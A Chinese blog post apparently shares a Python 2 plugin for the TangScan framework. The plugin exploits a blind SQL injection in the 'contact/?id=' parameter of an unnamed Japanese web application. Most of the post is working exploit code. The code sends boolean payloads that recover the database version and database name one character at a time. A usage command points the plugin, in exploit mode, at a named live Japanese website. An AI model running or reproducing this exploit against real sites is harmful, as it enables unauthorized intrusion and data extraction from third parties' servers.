A-A+
TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 | #! /usr/bin/env python # -*- coding: utf-8 -*- import string import time from thirdparty import requests from modules.exploit import TSExploit class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "Jp SQL injection", "product": "", "product_version": "", "desc": """ 日本某程序SQL漏洞检测插件 """, "license": self.license.TS, "author": ["虾米 https://woj.app"], "ref": [ {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"}, ], "type": self.type.injection, "privileged": False, "disclosure_date": "", "create_date": "" } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "" } }) self.register_result({ "status": False, "data": { }, "description": "", "error": "" }) def verify(self): user = "" user_length = 0 url = ("{domain}/contact/?id=".format(domain=self.option.url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate" } payloads = ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']+ list(string.ascii_lowercase) l = "1' AND (length(version())-%s)!=0 AND 'sbsb'='sbsb" s = "1' AND ORD(MID((IFNULL(CAST(version() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" for x in range(1, 30): tmp = l % str(x) exps_url = url + tmp try: print exps_url response = requests.get(exps_url, timeout=15, headers=headers, verify=False) time.sleep(0.3)#限制请求速率 if response.status_code != 200: self.result.status = False return except Exception,e: self.result.error = str(e) return if response.content.find("name=\"\" method") != -1: user_length = x break if user_length == 0: self.result.status = False return for x in range(1, user_length+1): for payload in payloads: a = s % (str(x), str(ord(payload))) exps_url = url + a try: print exps_url, user_length response = requests.get(exps_url, timeout=15, headers=headers, verify=False) time.sleep(0.3)#限制请求速率 if response.status_code != 200: self.result.status = False return except Exception,e: self.result.error = str(e) return if response.content.find("name=\"\" method") != -1: user = user + payload break if user.find("5.")==-1:#减小误报机率 self.result.status = False return self.result.status = True self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format( url=self.option.url, db_user=user ) def exploit(self): user = "" user_length = 0 url = ("{domain}/contact/?id=".format(domain=self.option.url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate" } payloads = list(string.ascii_lowercase)+ ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'] l = "1' AND (length(database())-%s)!=0 AND 'sbsb'='sbsb" s = "1' AND ORD(MID((IFNULL(CAST(database() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" for x in range(1, 100): tmp = l % str(x) exps_url = url + tmp try: response = requests.get(exps_url, timeout=15, headers=headers, verify=False) time.sleep(0.3)#限制请求速率 if response.status_code != 200: self.result.status = False return except Exception,e: self.result.error = str(e) return if response.content.find("name=\"\" method") != -1: user_length = x break if user_length == 0: self.result.status = False return for x in range(1, user_length+1): for payload in payloads: a = s % (str(x), str(ord(payload))) exps_url = url + a try: response = requests.get(exps_url, timeout=15, headers=headers, verify=False) time.sleep(0.3)#限制请求速率 if response.status_code != 200: self.result.status = False return except Exception,e: self.result.error = str(e) return if response.content.find("name=\"\" method") != -1: user = user + payload break self.result.status = True self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format( url=self.option.url, db_user=user ) if __name__ == '__main__': from modules.main import main main(TangScan()) |
使用命令: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏